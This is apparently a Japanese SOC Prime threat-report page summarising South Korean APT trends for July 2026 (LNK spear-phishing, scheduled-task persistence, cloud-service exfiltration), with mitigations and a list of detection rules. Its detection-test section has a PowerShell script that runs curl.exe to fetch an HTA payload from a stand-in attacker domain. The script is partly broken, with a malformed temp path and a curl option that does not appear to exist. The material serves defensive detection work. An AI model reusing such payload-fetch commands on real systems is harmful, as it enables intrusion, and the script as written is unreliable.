SOC Prime Bias: Critical

31 Aug 2026 06:13 UTC

韓国APT脅威レポート: 2026年7月のトレンド

Author Photo
SOC Prime Team linkedin icon フォローする
韓国APT脅威レポート: 2026年7月のトレンド
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

概要

AhnLabは、南韓の組織を標的とするスピアフィッシングキャンペーンを通じたAPT活動の増加を報告しています。攻撃は主にLNKファイルを利用してPowerShellスクリプト、AutoItスクリプト、バックドアなどのペイロードを配信します。一般的な手法には、タスクスケジューラを使用した永続化やDropboxやPubNubなどのサービスを介したデータ流出が含まれます。

調査

調査では、2026年7月に南韓の組織に対して使用されたAPTインフラストラクチャーに焦点を当てました。アナリストはこれらの活動を、配信方法と機能的特徴に基づきAからGに分類しました。また、DLLサイドローディングや、Windowsのネイティブユーティリティである curl.exe の悪用行動も特定されました。

緩和策

ユーザーは送信者の身元を確認し、不明または信頼できない送信元からの添付ファイルを開かないようにするべきです。組織はオペレーティングシステムとウェブブラウザを最新のセキュリティパッチで更新しておくべきです。また、V3などの最新のアンチウイルスおよびエンドポイント保護ソリューションの維持も推奨されます。

対応策

疑わしいLNKファイルや不正なタスクスケジューラのエントリが検出された場合、インシデント対応者は即座に影響を受けたホストを隔離すべきです。メモリ・フォレンジックスを実施して、注入されたバックドアや悪意のあるDLLを特定すべきです。異常なアウトバウンド接続を確認するため、ネットワークログも確認すべきです。

攻撃フロー

この部分はまだ更新中です。

検知

関連コマンドの検出によるLOLBAS MSHTA防御の回避行動のうたがわしい動作(プロセス生成経由)

SOCプライムチーム
2026年8月28日

cmdline経由の疑わしいCURL使用

SOCプライムチーム
2026年8月28日

監査経由の不審なスケジュールドタスク

SOCプライムチーム
2026年8月28日

プロキシ経由の第三者サービス/ツールを介したデータ侵入/流出/C2の可能性

SOCプライムチーム
2026年8月28日

DNS経由の第三者サービス/ツールを介したデータ侵入/流出/C2の可能性

SOCプライムチーム
2026年8月28日

IOC(HashMd5)による検出:2026年7月のAPT攻撃に関する脅威傾向レポート(韓国)

SOCプライムAIルール
2026年8月28日

Curl.Exeを利用した悪意のあるファイルのダウンロードと実行[Windows Sysmon]

SOCプライムAIルール
2026年8月28日

LNKファイル内の悪意のあるPowerShellコマンドの検出[Windows Powershell]

SOCプライムAIルール
2026年8月28日

シミュレーション実行

前提条件:テレメトリー&ベースライン事前チェックが合格していること。

理由:このセクションは、検出ルールをトリガーするように設計された敵対者技術(TTP)の正確な実行を詳細に説明します。コマンドと記述はTTPにより直接反映される必要があり、検出ロジックが期待する正確なテレメトリーを生成することを目的としています。抽象的または無関係な例は誤診を引き起こします。

  • 攻撃のストーリーとコマンド: 敵は curl.exe を使用して悪意のあるHTAファイルを %TEMP% ディレクトリにダウンロードし、足場を確立することを意図しています。現在の検出ロジックが機能しているかどうかをテストするために(「ダウンロード」または「実行」という単語を特に探しているため)、攻撃者はこれらの単語を偽の引数または説明の一部として明示的に含むコマンドラインを使用し、悪く構築されたスクリプトまたはSOCが探しているパターンを模倣しようとする特定の試みをシミュレートします。

  • 回帰テストスクリプト:

     # ルールに必要な具体的なキーワードを使用して敵を想定してcurlをシミュレート
      $tempPath = $env:TEMPmalicious.hta
      $url = "http://attacker-controlled-domain.com/payload.hta"
    
      # このコマンドは、コマンドライン文字列に「ダウンロード」と「実行」という言葉を含めて
      # ルールの「含む」ロジックをトリガーするために特別に作成されました。
      Start-Process "curl.exe" -ArgumentList "-L $url -o $tempPath --comment 'download and execute this file'"
  • クリーンアップコマンド:

     # シミュレーション中に作成されたダミーファイルを削除
      if (Test-Path "$env:TEMPmalicious.hta") {
          Remove-Item -Path "$env:TEMPmalicious.hta" -Force
      }